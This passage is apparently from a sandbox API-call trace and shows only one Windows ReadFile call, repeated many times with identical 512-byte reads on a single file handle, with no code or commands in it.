lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 
[0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, 
lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 
lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: 
lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, 
lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 